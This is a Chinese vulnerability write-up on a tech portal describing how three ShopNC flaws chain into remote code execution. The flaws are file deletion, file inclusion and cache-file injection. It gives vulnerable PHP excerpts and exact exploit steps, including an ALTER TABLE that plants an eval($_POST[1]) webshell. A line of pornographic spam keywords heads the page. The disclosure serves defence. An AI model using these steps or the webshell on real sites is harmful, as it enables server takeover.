自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

51CTO首頁(yè)

AI.x社區(qū)

軟考社區(qū)

免費(fèi)課

企業(yè)培訓(xùn)

鴻蒙開(kāi)發(fā)者社區(qū)

WOT技術(shù)大會(huì)

公眾號(hào)矩陣

移動(dòng)端

視頻課免費(fèi)課排行榜短視頻直播課軟考學(xué)堂

全部課程軟考華為認(rèn)證廠商認(rèn)證 IT技術(shù)PMP項(xiàng)目管理免費(fèi)題庫(kù)

在線學(xué)習(xí)

文章資源問(wèn)答課堂專欄直播

51CTO

鴻蒙開(kāi)發(fā)者社區(qū)

51CTO技術(shù)棧

51CTO官微

51CTO學(xué)堂

51CTO博客

CTO訓(xùn)練營(yíng)

鴻蒙開(kāi)發(fā)者社區(qū)訂閱號(hào)

51CTO軟考

51CTO學(xué)堂APP

51CTO學(xué)堂企業(yè)版APP

鴻蒙開(kāi)發(fā)者社區(qū)視頻號(hào)

51CTO軟考題庫(kù)

賬號(hào)設(shè)置退出

電子商務(wù)系統(tǒng)ShopNC多個(gè)漏洞結(jié)合可暴力getshell

作者：Yaseng 2014-03-11 13:15:01

ShopNC是一款網(wǎng)城創(chuàng)想公司旗下服務(wù)于企業(yè)客戶的電子商務(wù)系統(tǒng)，基于PHP5技術(shù)采用MVC 模式開(kāi)發(fā)，本文介紹了shopnc多個(gè)漏洞結(jié)合,可getshell有點(diǎn)暴力-_-

前言

ShopNC是一款網(wǎng)城創(chuàng)想公司旗下服務(wù)于企業(yè)客戶的電子商務(wù)系統(tǒng)，基于PHP5技術(shù)采用MVC 模式開(kāi)發(fā)，本文介紹了shopnc多個(gè)漏洞結(jié)合,可getshell有點(diǎn)暴力-_-

任意文件刪除

文件 control\store.php 1438 行 (還有幾個(gè)同樣的地方,新版已修復(fù))

........
$model_upload = Model('upload');
        $file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
        if(!$file_info){
            @unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
        }else{
 
........

本地文件包含

文件 /framework/core/base.php 71行

$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
    }
    if ( is_file( $act_file ) )
    {
        require( $act_file );
        $class_name = $_GET['act']."Control";
        if ( class_exists( $class_name ) )

后臺(tái)更新緩存寫(xiě)shell

/**
     * 更新一條廣告緩存
     *
     * @param unknown_type $adv
     * @return unknown
     */
    public function makeAdvCache($adv){
        $lang   = Language::getLangContent();
        $tmp .= "<?php \r\n";
        $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
        if (is_numeric($adv) && $adv > 0){
 
            $condition['adv_id'] = $adv;
            $adv_info = $this->getList($condition);
            $adv = $adv_info['0'];
        }
    ..................................
                       $content = addslashes($v);
            $content = str_replace('$','\$',$content);
            //防止有$符號(hào)被解析成變量
            $tmp .= '$'.$k." = \"".$content."\"; \r\n";
        }
        //緩存文件存放位置及文件名
        $cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
        file_put_contents($cache_file,$tmp);

繼續(xù)跟進(jìn)getList函數(shù)

public function getList($condition=array(), $page='', $limit='', $orderby=''){
    $param  = array();
    $param['table'] = 'adv';
    $param['field'] = $condition['field']?$condition['field']:'*';
    $param['where'] = $this->getCondition($condition);
    if($orderby == ''){
        $param['order'] = 'slide_sort, adv_id desc';
    }else{
        $param['order'] = $orderby;
    }
    $param['limit'] = $limit;
    return Db::select($param,$page);
}

寫(xiě)文件時(shí),從數(shù)據(jù)庫(kù)中遍歷key,跟value 未過(guò)濾key,key 可以從數(shù)據(jù)庫(kù)讀取,當(dāng)有數(shù)據(jù)庫(kù)可控時(shí),即可寫(xiě)入任意文件.

ShopNc GetShell

結(jié)合以上三個(gè)漏洞,即可優(yōu)雅的 getshell

流程

任意文件刪除 => 重裝 => 更改數(shù)據(jù)庫(kù) shopnc_adv 鍵值 =>更新廣告緩存 =>getshell

具體步驟

1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock

2:重裝系統(tǒng)

3:進(jìn)入MySQL 執(zhí)行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL

4:進(jìn)入后臺(tái) 更新廣告緩存 http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14

5:連接shell http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache

責(zé)任編輯：藍(lán)雨淚來(lái)源： FreeBuF

ShopNC ShopNC漏洞漏洞

點(diǎn)贊

51CTO技術(shù)棧公眾號(hào)

業(yè)務(wù)
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開(kāi)發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學(xué)堂精培企業(yè)培訓(xùn) CTO訓(xùn)練營(yíng)

<sub id="qukqa"></sub>

<p id="qukqa"></p>

<sub id="qukqa"><rt id="qukqa"></rt></sub>